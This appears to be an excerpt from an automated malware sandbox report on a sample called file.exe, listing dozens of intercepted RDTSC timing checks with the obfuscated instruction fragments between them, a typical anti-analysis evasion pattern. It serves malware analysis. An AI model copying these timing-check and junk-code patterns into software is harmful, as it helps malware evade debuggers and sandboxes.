              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8B0F second address: 11A8B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A91C2 second address: 11A91D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E40h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF162 second address: 11AF17C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF17C second address: 11AF183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE092 second address: 11AE0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE45C second address: 11AE4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E47h 0x00000009 jmp 00007FB8DCDE9E41h 0x0000000e popad 0x0000000f je 00007FB8DCDE9E38h 0x00000015 jmp 00007FB8DCDE9E3Bh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4A2 second address: 11AE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8DCE20296h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE4AD second address: 11AE4B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCDE9E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE8AC second address: 11AE8B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEE2D second address: 11AEE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AEE37 second address: 11AEE41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1653 second address: 11B1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1302 second address: 11B1306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B448A second address: 11B4499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB8DCDE9E36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4499 second address: 11B44AD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB8DCE20296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FB8DCE20296h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3F22 second address: 11B3F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E41h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9069 second address: 11B906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125EE4 second address: 1125F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E43h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FB8DCDE9E36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B87D9 second address: 11B87DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B87DD second address: 11B87E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C16 second address: 11B8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C1C second address: 11B8C46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FB8DCDE9E36h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB8DCDE9E3Dh 0x00000018 jmp 00007FB8DCDE9E3Ah 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9B2 second address: 11BB9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9BC second address: 11BB9DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8DCDE9E46h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9DC second address: 11BB9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9E1 second address: 11BB9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8DCDE9E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9ED second address: 11BB9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FB8DCE202A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE05 second address: 11BBE0F instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8DCDE9E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE0F second address: 11BBE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE16 second address: 11BBE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE1E second address: 11BBE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE24 second address: 11BBE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE31 second address: 11BBE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE35 second address: 11BBE50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8DCDE9E41h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE50 second address: 11BBE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE68 second address: 11BBE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE72 second address: 11BBE76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C196D second address: 11C1980 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FB8DCDE9E36h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1980 second address: 11C199A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C199A second address: 11C199E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C021A second address: 11C025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Fh 0x00000007 jmp 00007FB8DCE202A8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FB8DCE202B4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB8DCE202A2h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C077B second address: 11C0789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 ja 00007FB8DCDE9E36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0789 second address: 11C078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C078E second address: 11C0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0798 second address: 11C07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB8DCE2029Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0912 second address: 11C0916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116DEFF second address: 116DF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FB8DCE2029Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FB8DCE20298h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D1C2Ah] 0x00000030 movzx ecx, cx 0x00000033 push 00000004h 0x00000035 and edx, 792BD3C5h 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e jmp 00007FB8DCE2029Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0A6E second address: 11C0A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0C33 second address: 11C0C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FB8DCE202A2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9872 second address: 11C9877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C79E2 second address: 11C79E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7B6F second address: 11C7B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FB8DCDE9E36h 0x00000009 jng 00007FB8DCDE9E36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C89C1 second address: 11C89CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C89CB second address: 11C89CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1CFE second address: 11D1D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1D18 second address: 11D1D32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB8DCDE9E40h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1D32 second address: 11D1D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCE202A4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1D4A second address: 11D1D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1ED4 second address: 11D1ED9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22D9 second address: 11D22DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22DD second address: 11D22E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22E3 second address: 11D22E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22E8 second address: 11D2325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8DCE20296h 0x0000000a jc 00007FB8DCE20296h 0x00000010 popad 0x00000011 ja 00007FB8DCE20298h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push ebx 0x0000001d jng 00007FB8DCE20296h 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop ebx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB8DCE2029Dh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2446 second address: 11D244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D244E second address: 11D2459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8DCE20296h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D25EF second address: 11D25F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D25F3 second address: 11D260D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A0h 0x00000007 js 00007FB8DCE202A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D260D second address: 11D2613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2744 second address: 11D277A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007FB8DCE202A2h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB8DCE202A1h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D93F2 second address: 11D93FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB8DCDE9E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9541 second address: 11D955F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8DCE20296h 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FB8DCE20296h 0x00000012 popad 0x00000013 jo 00007FB8DCE20298h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D99E9 second address: 11D99F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D99F1 second address: 11D99F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D99F5 second address: 11D99FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA270 second address: 11DA276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA276 second address: 11DA27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E1AB6 second address: 11E1ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E17B0 second address: 11E17C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FB8DCDE9E36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E30FC second address: 11E3107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8DCE20296h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3107 second address: 11E310C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E310C second address: 11E3117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E49D1 second address: 11E49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E49D7 second address: 11E49E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4804 second address: 11E4808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4808 second address: 11E4818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB8DCE202A2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4818 second address: 11E4830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB8DCDE9E36h 0x0000000a popad 0x0000000b jo 00007FB8DCDE9E59h 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EACB6 second address: 11EACBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC60 second address: 11EDC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB8DCDE9E3Dh 0x0000000a jg 00007FB8DCDE9E42h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FB8DCDE9E3Fh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6169 second address: 11F616F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F616F second address: 11F6179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5D30 second address: 11F5D3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5D3C second address: 11F5D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA275 second address: 11FA27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA27E second address: 11FA288 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8DCDE9E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFEDF second address: 11FFEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFEE5 second address: 11FFF1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB8DCDE9E43h 0x00000019 jmp 00007FB8DCDE9E43h 0x0000001e rdtsc
